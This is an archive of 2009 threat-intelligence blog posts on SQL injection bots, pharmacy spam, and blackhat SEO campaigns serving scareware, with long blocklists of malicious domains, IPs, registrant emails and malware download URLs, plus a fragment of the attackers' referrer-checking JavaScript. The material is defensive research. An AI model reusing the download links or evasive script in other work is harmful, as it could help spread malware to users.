Wednesday, April 29, 2009

Massive SQL Injections Through Search Engine's Reconnaissance - Part Two

From the lone Chinese SQL injectors empowered with point'n'click tools for massive SQL injection attacks, to the much more efficient and automated botnet approach courtesy of the, for instance, ASProx botnet the process of automatically fetching URLs from public search engines in order to build hit lists for verifying against remote file inclusion attacks and potential SQL injections, remains a commodity feature in a great number of newly released malware bots.

In 2004, the Santy worm advertised the feature to the not so efficiently centered hordes of script kiddies back then. Due to its simplicity, but huge potential for abuse, the concept of SQL injections through search engines reconnaissance has not only reached a real-time syndication with the latest remotely exploitable web application vulnerabilities, but has also converged with remote file inclusion checks, local file inclusion checks, and ip2geolocation to unethically pen-test a particular country going beyond its designated domain extension.

A recently released malware bot is once again empowering the average script kiddie with the possibility to take advantage of the window of opportunity for each and every remotely exploitable web application flaw featured at Milworm, based on its real-time syndication of the exploits. Moreover, the IRC based bot is also featuring a console which allows manual exploitation or intelligence gathering for a particular site.

Some of the features include:
- Remote file inclusion
- Local file inclusion checks ()
- MySQL database details
- Extract all database names
- Data dumping from column and table
- Notification issued when Google bans the infected host for automatically using it

The commoditization of these features results in a situation where the window of opportunity for abusing a partcular web application flaw is abused much more efficiently due to the fact that reconnaissance data about its potential exploitability is already crawled by a public search engine - often in real time.

The concept, as well as the features within the bot are not rocket science - that's what makes it so easy to use.

Related posts:
Massive SQL Injection Attacks - the Chinese Way
Yet Another Massive SQL Injection Spotted in the Wild
Obfuscating Fast-fluxed SQL Injected Domains
Smells Like a Copycat SQL Injection In the Wild
SQL Injecting Malicious Doorways to Serve Malware
SQL Injection Through Search Engines Reconnaissance
Stealing Sensitive Databases Online - the SQL Style
Fast-Fluxing SQL injection attacks executed from the Asprox botnet
Sony PlayStation's site SQL injected, redirecting to rogue security software
Redmond Magazine Successfully SQL Injected by Chinese Hacktivists
- No comments:

Tuesday, April 28, 2009

Spamvertised Swine Flu Domains

The people behind the ongoing swine flu spam campaign have either missed their marketing lectures, haven't been to any at all, or are simply too lazy -- their processing order is not even using SSL -- to fully exploit the marketing window opened by the viral oubreak - the majority of spamvertised domains are redirecting to your typical Canadian Pharmacy scam, instead of swine flu related templates.

Swine flu spamvertised domains:
lijgihab.cn; jihkohab.cn; litgukab.cn; namyalab.cn; waytipab.cn; ritlarab.cn; bersoxab.cn; xaqkabeb.cn; jamnibeb.cn; pahdeheb.cn; qeqyukeb.cn; qiwqoreb.cn; zajbaveb.cn; zacniyeb.cn; baqnubib.cn; zephecib.cn; texlocib.cn; fedpijib.cn;meysujib.cn; qoltujib.cn; mukwujib.cn; buljakib.cn; cutcurib.cn; bejdasib.cn; xikgosib.cn; bacnaxib.cn; kuskuzib.cn; juvyidob.cn; sowgugob.cn; buhbulob.cn; tonjotob.cn; kozgewob.cn; gasfexob.cn; pocdiyob.cn; kujroyob.cn; mirlacub.cn; kixqucub.cn; rovjudub.cn; jokrogub.cn; tusyajub.cn; gixxukub.cn; mospomub.cn; hixmipub.cn; zismerub.cn; cegfasub.cn; dimfevub.cn; qebhuvub.cn; duvlixub.cn; tiqceyub.cn; cogwibac.cn; minkucac.cn; dadwafac.cn; dilpogac.cn; jovsogac.cn; juwcolac.cn; wefmunac.cn; cexfopac.cn; wejpopac.cn; dovniqac.cn; mulsatac.cn; labwewac.cn; lirquwac.cn; latzoyac.cn; tuwbazac.cn; motjudec.cn; jicmefec.cn; qujqugec.cn; fajnahec.cn; wobfojec.cn; saybilec.cn; siyjoqec.cn; gehgixec.cn; gajdezec.cn; sgytubic.cn; cabfecic.cn; nedsicic.cn; xorpilic.cn; bulxopic.cn; kisniric.cn; beszesic.cn; hiwdosic.cn; linrudoc.cn; rijnakoc.cn; mahhekoc.cn; hahwikoc.cn; labniloc.cn; zocwoloc.cn; gommupoc.cn; yubbaqoc.cn; mefbuqoc.cn; xeclaroc.cn; qurburoc.cn; wupqatoc.cn; capjebuc.cn; wofmufuc.cn; boxxiguc.cn; zeffehuc.cn; pegvijuc.cn; bubkenuc.cn; fixfunuc.cn;

qivbiruc.cn; vahraxuc.cn; camxezuc.cn; tomyubad.cn; sohmifad.cn; sukgogad.cn; kossehad.cn; mopwijad.cn; pagtujad.cn; nohxokad.cn; pugvuqad.cn; bapvusad.cn; wekzetad.cn; lozfoyad.cn; vuppoyad.cn; forvafed.cn; cetcofed.cn; dadrofed.cn; sacvahed.cn; qoqgoled.cn; madwemed.cn; rilgeped.cn; voydewed.cn; liyxozed.cn; regmihid.cn; bujquhid.cn; damtuqid.cn; nifhosid.cn; dapfotid.cn; yofkibod.cn; roghudod.cn; gacpagod.cn; xijhihod.cn; japtikod.cn; meyrilod.cn; patjulod.cn; hixvunod.cn; towqotod.cn; ridnuxod.cn; vevteyod.cn; deqgobud.cn; lilnedud.cn; rusdehud.cn; zidpajud.cn; qibxenud.cn; xixvasud.cn; yapqitud.cn; xuldeyud.cn; nacyeyud.cn; ciknezud.cn; qiwsuzud.cn; leblidaf.cn; timpejaf.cn; vacxamaf.cn; nugnosaf.cn; xawpicef.cn; beqnahef.cn; kumhulef.cn; somnimef.cn; pejyunef.cn; zuwpikif.cn; bixvikif.cn; sajbipif.cn; vikqipif.cn; xotdaxif.cn; qalrezif.cn; xuhkudof.cn; lijsofof.cn; gimvufof.cn; kofgehof.cn; xixgikof.cn; percaqof.cn; nifjarof.cn; xivqirof.cn; rucmusof.cn; yizsatof.cn; qihqutof.cn; devqivof.cn; mijvaxof.cn; kiyvayof.cn; bubduyof.cn; pohfabuf.cn; zudsaduf.cn; tuhfehuf.cn; yaytumuf.cn; fumtinuf.cn; gibkesuf.cn; xaqqivuf.cn; wandawuf.cn; faqloyuf.cn; paqhizuf.cn; nowzacag.cn; xowjicag.cn; nolyodag.cn; tavyafag.cn; lijgihab.cn; jihkohab.cn; litgukab.cn; namyalab.cn;waytipab.cn; ritlarab.cn; bersoxab.cn; xaqkabeb.cn; jamnibeb.cn; pahdeheb.cn; qeqyukeb.cn; qiwqoreb.cn; zajbaveb.cn; zacniyeb.cn; baqnubib.cn; zephecib.cn; texlocib.cn; fedpijib.cn; meysujib.cn; qoltujib.cn; mukwujib.cn; buljakib.cn; cutcurib.cn; bejdasib.cn; xikgosib.cn; bacnaxib.cn; kuskuzib.cn; juvyidob.cn; sowgugob.cn; buhbulob.cn; tonjotob.cn; kozgewob.cn; gasfexob.cn; pocdiyob.cn; kujroyob.cn; mirlacub.cn; kixqucub.cn; rovjudub.cn; jokrogub.cn; tusyajub.cn; gixxukub.cn; mospomub.cn; hixmipub.cn; zismerub.cn; cegfasub.cn; dimfevub.cn; qebhuvub.cn; duvlixub.cn; tiqceyub.cn; cogwibac.cn; minkucac.cn; dadwafac.cn; dilpogac.cn; jovsogac.cn; juwcolac.cn; wefmunac.cn; cexfopac.cn; wejpopac.cn; dovniqac.cn; mulsatac.cn; labwewac.cn; lirquwac.cn; latzoyac.cn; tuwbazac.cn; motjudec.cn; jicmefec.cn; qujqugec.cn; fajnahec.cn; wobfojec.cn; saybilec.cn; siyjoqec.cn; gehgixec.cn; gajdezec.cn; sgytubic.cn; cabfecic.cn; nedsicic.cn; xorpilic.cn; bulxopic.cn; kisniric.cn; beszesic.cn; hiwdosic.cn; linrudoc.cn; rijnakoc.cn; mahhekoc.cn; hahwikoc.cn; labniloc.cn; zocwoloc.cn; gommupoc.cn; yubbaqoc.cn; mefbuqoc.cn; xeclaroc.cn; qurburoc.cn; wupqatoc.cn; capjebuc.cn; wofmufuc.cn; boxxiguc.cn; zeffehuc.cn; pegvijuc.cn; bubkenuc.cn; fixfunuc.cn; qivbiruc.cn; vahraxuc.cn; camxezuc.cn; tomyubad.cn; sohmifad.cn; sukgogad.cn; kossehad.cn; mopwijad.cn; pagtujad.cn; nohxokad.cn; pugvuqad.cn; bapvusad.cn; wekzetad.cn; lozfoyad.cn; vuppoyad.cn; forvafed.cn; cetcofed.cn; dadrofed.cn; sacvahed.cn; qoqgoled.cn; madwemed.cn; rilgeped.cn; voydewed.cn; liyxozed.cn; regmihid.cn; bujquhid.cn; damtuqid.cn; nifhosid.cn; dapfotid.cn; yofkibod.cn; roghudod.cn; gacpagod.cn; xijhihod.cn; japtikod.cn; meyrilod.cn; patjulod.cn; hixvunod.cn; towqotod.cn; ridnuxod.cn; vevteyod.cn; deqgobud.cn; lilnedud.cn; rusdehud.cn; zidpajud.cn; qibxenud.cn; xixvasud.cn; yapqitud.cn; xuldeyud.cn; nacyeyud.cn; ciknezud.cn; qiwsuzud.cn; leblidaf.cn; timpejaf.cn; vacxamaf.cn; nugnosaf.cn; xawpicef.cn; beqnahef.cn; kumhulef.cn; somnimef.cn; pejyunef.cn; zuwpikif.cn; bixvikif.cn; sajbipif.cn; vikqipif.cn; xotdaxif.cn; qalrezif.cn; xuhkudof.cn; lijsofof.cn; gimvufof.cn; kofgehof.cn; xixgikof.cn; percaqof.cn; nifjarof.cn; xivqirof.cn; rucmusof.cn; yizsatof.cn; qihqutof.cn; devqivof.cn; mijvaxof.cn; kiyvayof.cn; bubduyof.cn; pohfabuf.cn; zudsaduf.cn; tuhfehuf.cn; yaytumuf.cn; fumtinuf.cn; gibkesuf.cn; xaqqivuf.cn; wandawuf.cn; faqloyuf.cn; paqhizuf.cn; nowzacag.cn; xowjicag.cn; nolyodag.cn; tavyafag.cn; hujrulag.cn; sodbenag.cn; gafkiqag.cn; lijgihab.cn; jihkohab.cn; litgukab.cn; namyalab.cn; waytipab.cn; ritlarab.cn; bersoxab.cn; xaqkabeb.cn; jamnibeb.cn; pahdeheb.cn; qeqyukeb.cn; qiwqoreb.cn; zajbaveb.cn; zacniyeb.cn; baqnubib.cn; zephecib.cn; texlocib.cn; fedpijib.cn; meysujib.cn; qoltujib.cn; mukwujib.cn; buljakib.cn; cutcurib.cn; bejdasib.cn; xikgosib.cn; bacnaxib.cn; kuskuzib.cn; juvyidob.cn; sowgugob.cn; buhbulob.cn; tonjotob.cn; kozgewob.cn; gasfexob.cn; pocdiyob.cn; kujroyob.cn; mirlacub.cn; kixqucub.cn; rovjudub.cn; jokrogub.cn; tusyajub.cn; gixxukub.cn; mospomub.cn; hixmipub.cn; zismerub.cn; cegfasub.cn; dimfevub.cn; qebhuvub.cn; duvlixub.cn; tiqceyub.cn; cogwibac.cn; minkucac.cn; dadwafac.cn; dilpogac.cn; jovsogac.cn; juwcolac.cn; wefmunac.cn; cexfopac.cn; wejpopac.cn; dovniqac.cn; mulsatac.cn; labwewac.cn; lirquwac.cn; latzoyac.cn; tuwbazac.cn; motjudec.cn; jicmefec.cn; qujqugec.cn; fajnahec.cn; wobfojec.cn; saybilec.cn; siyjoqec.cn; gehgixec.cn; gajdezec.cn; sgytubic.cn; cabfecic.cn; nedsicic.cn; xorpilic.cn; bulxopic.cn; kisniric.cn; beszesic.cn; hiwdosic.cn; linrudoc.cn; rijnakoc.cn; mahhekoc.cn; hahwikoc.cn; labniloc.cn; zocwoloc.cn; gommupoc.cn; yubbaqoc.cn; mefbuqoc.cn; xeclaroc.cn; qurburoc.cn; wupqatoc.cn; capjebuc.cn; wofmufuc.cn; boxxiguc.cn; zeffehuc.cn; pegvijuc.cn; bubkenuc.cn; fixfunuc.cn; qivbiruc.cn; vahraxuc.cn; camxezuc.cn; tomyubad.cn; sohmifad.cn; sukgogad.cn; kossehad.cn; mopwijad.cn; pagtujad.cn; nohxokad.cn; pugvuqad.cn; bapvusad.cn; wekzetad.cn; lozfoyad.cn; vuppoyad.cn; forvafed.cn; cetcofed.cn; dadrofed.cn; sacvahed.cn; qoqgoled.cn; madwemed.cn; rilgeped.cn; voydewed.cn; liyxozed.cn; regmihid.cn; bujquhid.cn; damtuqid.cn; nifhosid.cn; dapfotid.cn; yofkibod.cn; roghudod.cn; gacpagod.cn; xijhihod.cn; japtikod.cn; meyrilod.cn; patjulod.cn; hixvunod.cn; towqotod.cn; ridnuxod.cn; vevteyod.cn; deqgobud.cn; lilnedud.cn; rusdehud.cn; zidpajud.cn; qibxenud.cn; xixvasud.cn; yapqitud.cn; xuldeyud.cn; nacyeyud.cn; ciknezud.cn; qiwsuzud.cn; leblidaf.cn; timpejaf.cn; vacxamaf.cn; nugnosaf.cn; xawpicef.cn; beqnahef.cn; kumhulef.cn; somnimef.cn; pejyunef.cn; zuwpikif.cn; bixvikif.cn; sajbipif.cn; vikqipif.cn; xotdaxif.cn; qalrezif.cn; xuhkudof.cn; lijsofof.cn; gimvufof.cn; kofgehof.cn; xixgikof.cn; percaqof.cn; nifjarof.cn; xivqirof.cn; rucmusof.cn; yizsatof.cn; qihqutof.cn; devqivof.cn; mijvaxof.cn; kiyvayof.cn; bubduyof.cn; pohfabuf.cn; zudsaduf.cn; tuhfehuf.cn; yaytumuf.cn; fumtinuf.cn; gibkesuf.cn; xaqqivuf.cn; wandawuf.cn; faqloyuf.cn; paqhizuf.cn; nowzacag.cn; xowjicag.cn; nolyodag.cn; tavyafag.cn; hujrulag.cn; sodbenag.cn; gafkiqag.cn; remqavag.cn

Happy blacklisting/cross-checking!

Related posts:
Inside an Affiliate Spam Program for Pharmaceuticals
Love is a Psychedelic, Too
Pharmaceutical Spammers Targeting LinkedIn
Fast-Flux Spam and Scams Increasing
Storm Worm Hosting Pharmaceutical Scams
Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings
Incentives Model for Pharmaceutical Scams
- No comments:

Wednesday, April 22, 2009

Massive Blackhat SEO Campaign Serving Scareware

Over the past couple of days, I've been monitoring yet another massive blackhat SEO campaign consisting of the typical hundreds of thousands of already crawled bogus pages serving scareware/fake security software.

Later on Google detected the campaign and removed all the blackhat SEO farms from its index, which during the time of assessment were close to a hundred domains with hundreds of subdomains, and thousands of pages within.

And despite that the abuse notifications for some of the central redirection domains proved effective,  it took the cybercriminals approximately 24 hours to catch up, and once again start hijacking search queries, in a combination of scareware, and pay per click redirections.

It's worth pointing out that this very latest campaign is directly related to last's week's keywords hijacking blackhat SEO campaign, with both campaigns relying on identical redirection domains, and serving the same malware. Who's behind these search engine poisoning attacks? An Ukranian gang monetizing the hijacked traffic through the usual channels - scareware and reselling of the anticipated traffic.

The first stage of the campaign was relying on mainstream media titles within its pages such as USA News; BBC News; CNN News as well as Hottest info!; HOT NEWS; Official Website and Official Site, thereby making it fairly easy to expose their portfolio of domains.

Interestingly, the cybercriminals appear to have detected the activity -- certain traffic management kits can log attempts of wandering around -- and removed the titles, which combined with the typical referrer checking made the campaign a bit more evasive :

""var ref,i,is_se=0; var se = new Array("google.","msn.","yahoo.","comcast.","aol.","dead"); if(document.referrer)ref=document.referrer; else ref=""; for(i=0;i<5;i++""

Once the user visits any of the domains within the portfolio, with a referrer check confirming he used a search engine to do so, two javascripts load, one dynamically redirecting to the portfolio of fake security software, and the other logging the visit using an Ukrainian web site counter service (c.hit.ua/hit?i=6058&g=0&x=2&s=1&c=1&t=420&w=1024&h=768&d=24&0.5505934176708958&r=&u=http%3A//13news.hobby-site.com/counter.js')


The most recent list of of domains on popular DNS services is as follows. Sub-domains within are excluded since there are several hundred currently active per domain:
0kfzzl .us - 95.168.172.202 -  Email: diannefostergcei@yahoo.com
52ubih .us - 95.168.172.198 - Email: joeminoryhjb@yahoo.com
5nw8b3 .us - 95.168.172.193 - Email: carolynfosteruwwi@yahoo.com
60mptk .us - 95.168.172.192 - Email: bernadettehockadayfedt@yahoo.com
6ry4nv .us - 95.168.172.191 - Email: markpackvesa@yahoo.com
77m8uh .us - 95.168.172.190 - Email: miguelbellhyes@yahoo.com
axnwpy .us - 95.168.172.204 - Email: hungsandfordoehx@yahoo.com
bumgli .us - Email: coobybrown3@gmail.com
cqxuhk .us - 95.168.172.203 - Email: michaelkoontzutae@yahoo.com
dfkghdf .us - 212.95.58.49 - Email: umora@live.com
dfwdowrly .us - Email: orest@hotmail.ru
edtbcm .us - 95.168.172.198 - Email: warrenskinnerumpi@yahoo.com
edu4life .us - Email - joh.n.ebrilo@gmail.com

fc4oih .us -  95.168.172.187 - Email: florencemclaughlinovpp@yahoo.com
fcbcwo .us - 89.149.216.146 - Email: dorisnaupkou@yahoo.com
fpq58z .us - 95.168.172.205 - Email: thomassoileautysz@yahoo.com
fzjt82 .us -  95.168.172.188 - maryevansarpl@yahoo.com
gfor8g .us - Email: christopherdockinsptdg@yahoo.com
gotpig .us - Email: BeatriceJBrown@text2re.com
hhjsuuy .us - 217.20.117.198 - Email: jarovv@gmail.com
hk2april .us - 78.159.122.123 - Email: zainez@gmail.com
hk3april .us - 78.159.122.137 - Email: zainez@gmail.com
hno6sh .us - 89.149.238.12 - Email: alfredmeadenzcy@yahoo.com
i2u6nr .us -  95.168.172.202 - Email: jameshendricksxuwg@yahoo.com
ik3trends .us -  88.214.198.14 - Email: akililewis@gmail.com
itn92j .us -  Email: nicholasmanoicdmg@yahoo.com
j4vre4 .us -  bettyfavorsiqzv@yahoo.com
kzq2i2 .us - 89.149.229.157 - Email: robertmitchellrswv@yahoo.com

l5ykp6 .us - 95.168.172.195 - Email: chrishuntpjzc@yahoo.com
lh85uk .us - 95.168.172.200 - Email: susannelsonggyp@yahoo.com
lp24april .us - 89.149.228.129 - Email: ramerod@gmail.com
m9nvzp .us -  89.149.216.50 - Email: jenniferduncanakcq@yahoo.com
mm00april .us - 212.95.55.115 - Email: brevno3@gmail.com
mm99april .us - 78.159.122.91 - Email: brevno3@gmail.com
n5y3m8 .us - 89.149.243.86 - Email: imogenegreenrqqr@yahoo.com
na8nw2 .us - 89.149.216.146 - Email: jeremyfitchcupl@yahoo.com
oag3h8 .us - 95.168.172.200 - Email: susanspidelesig@yahoo.com
po1april .us - 212.95.55.138 - Email: preadzz@gmail.com
po3april .us - 78.159.122.93 - Email: preadzz@gmail.com
pp6sqo .us - 95.168.172.197 - Email: connierobertsolni@yahoo.com
pr061r .us - 89.149.216.146 - Email: shirleywardauof@yahoo.com
qdhccy .us - Email: shark@nightmail.ru
qq338p .us - 89.149.221.36 - Email: debragonzalezyplu@yahoo.com

repszp .us - 89.149.221.36 - Email: christinamerrillzzhd@yahoo.com
rrgtnm .us - 95.168.172.203 - Email: josephelliskozc@yahoo.com
rt658y .us - 89.149.207.33 - Email: luannamcgeeiqwb@yahoo.com
rzi6rj .us - 95.168.172.189 - Email: leatriceporterlhbz@yahoo.com
scsrn8 .us - 95.168.172.201 - Email: donnabrownpgpa@yahoo.com
t9xu44 .us - 95.168.172.194 - Email: robertbissettezeub@yahoo.com
trfddp .us - 89.149.243.89 - Email: davidwilliamsqljt@yahoo.com
up3xv7 .us - Email: dennismontantecoco@yahoo.com
vecy5r .us - Email: merlynsmithsqxm@yahoo.com
vlj5jn .us - 95.168.172.196 - Email: angelostewartqfoq@yahoo.com
vr31qo .us - 95.168.172.199 - Email: christinearcherzhqz@yahoo.com
wk7iie .us - 95.168.172.204 - Email: jewellnakashimalgny@yahoo.com
x2ar3e .us - Email: bobbielopezeits@yahoo.com
xe24py .us - 89.149.243.138 - Email: johnbarberprfi@yahoo.com
xecuk8 .us - 95.168.172.194 - Email: lutheralfaronloz@yahoo.com
yl8ais .us - 89.149.216.147 - Email: meredithflackflub@yahoo.com
yqfvp4 .us - 78.159.96.84 - Email: julierussellnnro@yahoo.com
zvlewrms .us - Email: ygovoruhin@list.ru 
zxe11d .us -  95.168.172.195 - Email: christopherlewisxghb@yahoo.com
zy7itf .us - 89.149.207.244 - Email: cindyruizixqr@yahoo.com

13news.doesntexist .com
13news.hobby-site .com
17news.endofinternet .net
18news.homeftp .org
19news.blogdns .com
19news.dnsdojo .org
19news.gotdns .com
19news.kicks-ass .org
19news.servebbs .com
22news.blogdns .com
creditratingguide. hobby-site.com
disneyearrings .hobby-site.com
flatbellydiet .hobby-site.com
hydrangacutflowers .hobby-site.com
isa-geek .org
mxzsaw .hobby-site.com
mysteryterms .hobby-site.com

The rotated scareware/fake security software domains include: scan-antispyware-4pc .com - parked at 195.88.81.93 the same portfolio of fake security software domains which I warned that by blocking you would proactively protect your customers from black hat SEO campaigns - like this one for instance 
pcvistaxpcodec .com
onlinevirus-scannerv2 .com
av-antispyware .com
scan-antispy-4pc .com
fastviruscleaner .com
securityhelpcenter .com
scan-antispy-4pc .com
scanner-work-av .com
scanner-antispy-av-files .com
adwarealert .com
proantispyware .com

Download locations/related fake codec redirections:
winpcdown10 .com (194.165.4.77)
suckitnow1 .com
winpcdown99 .com
loyaldown99 .com
codecxpvista .com
wincodecupdate .com
velzevuladmin .com
tubeloyaln .com
wedare.tubeloyaln .com
lamer.tubeloyaln .com
billingpayment.netcodecs.tubeloyaln .com
videosz.tubeloyaln .com
loyal-porno .com - the same domain was recently exposed in the same blackhat  SEO campaign
win-pc-defender .com
codecvistaz .com
loyalvideoz .com

Sample detection rates:
litetubevideoz .net/codec/277.exe - detection rate
winpcdown99 .com/pcdef.exe - detection rate
winpcdown99 .com/file.exe - detection rate
setup.adwarealert .com/setupxv.exe - detection rate
files.scanner-antispy-av-files .com/exe/setup_200093_1_1.exe - detection rate

Monitoring of the campaign would continue.

Related posts:
Dissecting the Bogus LinkedIn Profiles Malware Campaign
Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software
Blackhat SEO Redirects to Malware and Rogue Software
The Invisible Blackhat SEO Campaign
Attack of the SEO Bots on the .EDU Domain
p0rn.gov - The Ongoing Blackhat SEO Operation
The Continuing .Gov Blackat SEO Campaign
The Continuing .Gov Blackhat SEO Campaign - Part Two
Rogue RBN Software Pushed Through Blackhat SEO
Massive Blackhat SEO Targeting Blogspot
Blackhat SEO Campaign at The Millennium Challenge Corporation
- No comments:

Thursday, April 16, 2009

A CCDCOE Report on the Cyber Attacks Against Georgia

Following the coverage of my "Coordinated Russia vs Georgia cyber attack in progress" research in the Georgian government's official report "Russian Cyberwar on Georgia" (on page 4), I was very excited to find out that a report by NATO's Cooperative Cyber Defense Centre of Excellence entitled "Cyber Attacks Against Georgia: Legal Lessons Identified" and authored by Eneken Tikk, Kadri Kaska, Kristel Rünnimeri, Mari Kert, Anna-Maria Talihärm, Liis Vihul, is not only quoting me extensively, but  has also reproduced the entire research within the Annexes.

Looks great!

Recommended reading:
DDoS Attack Graphs from Russia vs Georgia's Cyberattacks
The Russia vs Georgia Cyber Attack
Pro-Israeli (Pseudo) Cyber Warriors Want your Bandwidth
People's Information Warfare Concept
Combating Unrestricted Warfare
The Cyber Storm II Cyber Exercise
Chinese Hacktivists Waging People's Information Warfare Against CNN
The DDoS Attacks Against CNN.com
China's Cyber Espionage Ambitions
North Korea's Cyber Warfare Unit 121
Chinese Hackers Attacking U.S Department of Defense Networks
- No comments:

A Diverse Portfolio of Fake Security Software - Part Nineteen

You know things are getting out of hand when the scareware ecosystem scales to the point when typosquatted scareware domains offering removal services for the very same scareware distributed under multiple brands.

In response to the potential Conficker-ization of the scareware business, part nineteen of the Diverse Portfolio of Fake Security Software is the most massive update since the series started, and with a reason - to squeeze the cybercrime ecosystem, and ruin their malicious economies of scale revenue generation approaches.

Here are the most recent additions, with their associated registrant emails for clustering, cross-checking, and case building purposes:

vundofixtool .com (174.132.250.194)
remove-winpc-defender .com
remove-virus-melt .com
remove-ultra-antivir-2009 .com
remove-ultra-antivirus-2009 .com
remove-total-security .com
remove-system-guard .com
remove-spyware-protect-2009 .com
remove-spyware-protect .com
remove-spyware-guard .com
remove-personal-defender .com
remove-ms-antispyware .com
remove-malware-defender .com
remove-ie-security .com
remove-av360 .com
remove-antivirus-360 .com
remove-a360 .com
av360removaltool .com
antivirus360remover .com
remove-winpc-defender .com
remove-virus-melt .com
remove-virus-alarm .com
remove-ultra-antivirus-2009 .com
remove-ultra-antivir-2009 .com
remove-total-security .com

gotipscan .com (66.197.154.199) Robert Sampson Email: bausness@gmail.com
scanline6 .com
scanstep6 .com
scanbest6 .com
goscandata .com
goscanhigh .com
true6scan .com
any6scan .com
golitescan .com
gofanscan .com
gotipscan .com
gostarscan .com
goluxscan .com
goonlyscan .com
scan6step .com
goscanstep .com
scan6fast .com
scanline6 .info
scanlog6 .info
linescan6 .info
mainscan6 .info
log6scan .info
main6scan .info

addedantiviruslive .com (94.247.2.215) Administrative Email: werracruz99008@gmail.com
searchrizotto .com
easyaddedantivirus .com
yourcountedantivirus .com
av-plus-support .com
yourguardonline .cn
easydefenseonline .cn
bestprotectiononline .cn
yourguardstore .cn
examinepoisonstore .cn
freecoverstore .cn
myexaminevirusstore .cn
bestexaminedisease .cn
yourfriskdisease .cn
friskdiseaselive .cn
bestdefenselive .cn
bigprotectionlive .cn
bigcoverlive .cn
easyserviceprotection .cn
easypersonalprotection .cn
myascertainpoison .cn
yourguardpro .cn
refugepro .cn
mycheckdiseasepro .cn
yourcheckpoisonpro .cn
bigdefense2u .cn
newguard4u .cn
mydefense4u .cn
bestcover4u .cn

fullsecurityshield .com (209.44.126.14) Gregory Bershk Email: bershkapull@gmail.com
greatsecurityshield .com
trustsecurityshield .com
anytoplikedsite .com
topsecurityapp .com
inetsecuritycenter .com
securitytopagent .com
thebestsecurityspot .com
topsecurity4you .com
fullandtotalsecurity .com

extrantivirus.com (94.75.209.11)
rapid-antivir-2009.com
rapid-antivir2009.com
rapidantivirus2009.com
rapidantivirus09.com
rapidantivirus.com
ultraantivirus2009.com
soft-traffic.com
seresult.com is a traffic management domain for the campaign (e.g seresult .com/go.php?id=3466)

greatstabilitytraceonline .com (94.247.3.4) Jacquelyn Jain Email: jacquelynjjain@gmail.com
beststabilityscan .com
beststabilityscans .com
esnetscanonline .com
greatstabilitytraceonline .com
greatvirusscan .com
networkstabilitytrace .com
onlinestabilityscanada .com
protectionexamine .com
quickstabilityscan .com
safetyexamine .com
stabilityinetscan .com
stabilitysolutionslook .com
swiftsafetyexamine .com
webprotectionscan .com
webwidesecurity .com

scanmix4 .com (63.146.2.92) Clifford Barton Email: learnico@gmail.com
bestscan7 .com
goscandata .com
scan7live .com
new7scan .com
godatascan .com
gosidescan .com
goluxscan .com
goonlyscan .com
goscanstep .com
scantool4 .info
newscan4 .info
scannew4 .info
tool4scan .info

exstra-av-scanner .net (78.26.179.237) Joan Oglesby Email: extra.antivirus@gmail.com
msantivir-storage .com
ms-antivirus-storage .com
goodproantispyware .com
ms-antivir-scan .com
anispy-storage-ms .com
ms-av-storage-best .com
antivir-scanner-ms-av .com

msscan-files-antivir .com (195.88.81.93)
hot-girl-sex-tube .com
msscan-files-antivir .com
msscanner-top-av .com
msscanner-files-av .com
antivir-4pc-ms-av .com

ultraantivirus2009 .com (64.86.17.9)
virusalarmpro .com
vmfastscanner .com
mysuperviser .com
pay-virusdoctor .com
virusmelt .com
payvirusmelt .com
mysupervisor .net

msscanner-top-av .com (195.88.81.93)
msscanner-files-av .com
antivir-4pc-ms-av .com
hot-girl-sex-tube .com

antivirus-av-ms-check .com (78.26.179.131)
antivirus-av-ms-checker .com
ms-anti-vir-scan .com
mega-antiviral-ms .com

extremetube09 .com (94.247.2.7) Mariya Latinina Email: latinina40@gmail.com
softupdate09 .com
extrafastdownload .com
myrealtube .net
extraantivir .com (206.53.61.74)
no-as-scanner .com (195.88.81.37) Roy Latoya Email: latoysmith@gmail.com
pro-scanner-av-pc .com
tantispyware .com (65.110.60.123; 65.110.60.122)
webantispy .com
pantispyware09 .com
fastantivirus09 .com (94.75.209.74)

Blacklisting --until the domains themselves get suspended -- the scareware domains proactively protects your customers from the "final output" of a huge percentage of attacks taking advantage of blackhat SEO, SQL injection, site compromise, malvertising, and automatic abuse of Web 2.0 services through human-based CAPTCHA solving such as Digg; LinkedIn, Bebo, Picasa and ImageShack, YouTube and Google Video.

Related posts:
A Diverse Portfolio of Fake Security Software - Part Eighteen
A Diverse Portfolio of Fake Security Software - Part Seventeen
A Diverse Portfolio of Fake Security Software - Part Sixteen
A Diverse Portfolio of Fake Security Software - Part Fifteen
A Diverse Portfolio of Fake Security Software - Part Fourteen
A Diverse Portfolio of Fake Security Software - Part Thirteen
A Diverse Portfolio of Fake Security Software - Part Twelve
A Diverse Portfolio of Fake Security Software - Part Eleven
A Diverse Portfolio of Fake Security Software - Part Ten
A Diverse Portfolio of Fake Security Software - Part Nine
A Diverse Portfolio of Fake Security Software - Part Eight
A Diverse Portfolio of Fake Security Software - Part Seven
A Diverse Portfolio of Fake Security Software - Part Six
A Diverse Portfolio of Fake Security Software - Part Five
A Diverse Portfolio of Fake Security Software - Part Four
A Diverse Portfolio of Fake Security Software - Part Three
A Diverse Portfolio of Fake Security Software - Part Two
Diverse Portfolio of Fake Security Software
- No comments:

Wednesday, April 15, 2009

Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware

Not necessarily in real-time (Syndicating Google Trends Keywords for Blackhat SEO) but scareware/fake security software distributors quickly attempted to capitalize on the anticipated traffic related to this weekend's Twitter XSS worm StalkDaily/Mikeyy.

What's particularly interesting about this campaign, is not the fact that all of the currently active domains are operated by the same individual/group of individuals or that their blackhat SEO farms are growing to cover a much wider portfolio of keywords.

It's a tiny usa.js script (e.g my1.dynalias .org/usa.js) hosted on all of the domains, which takes advantage of a simple evasive practice - referrer checking in order to serve or not to serve the malicious content.

For instance, deobfuscated the script checks whether the user is coming from the following search engines var se = new Array("google", "msn", "aol.com", "yahoo", " comcast"); if (document.referrer)ref = document.referrer;. If the user/researcher is basically wandering around, a blackhat SEO page with no malicious redirections would be served.

The following are all of the currently active and participating domains/subdomains:
tran.tr.ohost .de
actual.homelinux .com
achyutheil.ac.ohost .de
aprln.getmyip .com
east.homeftp .org 
my1.dynalias .org
my2.dynalias .org
my3.dnsalias .org
my5.webhop .org

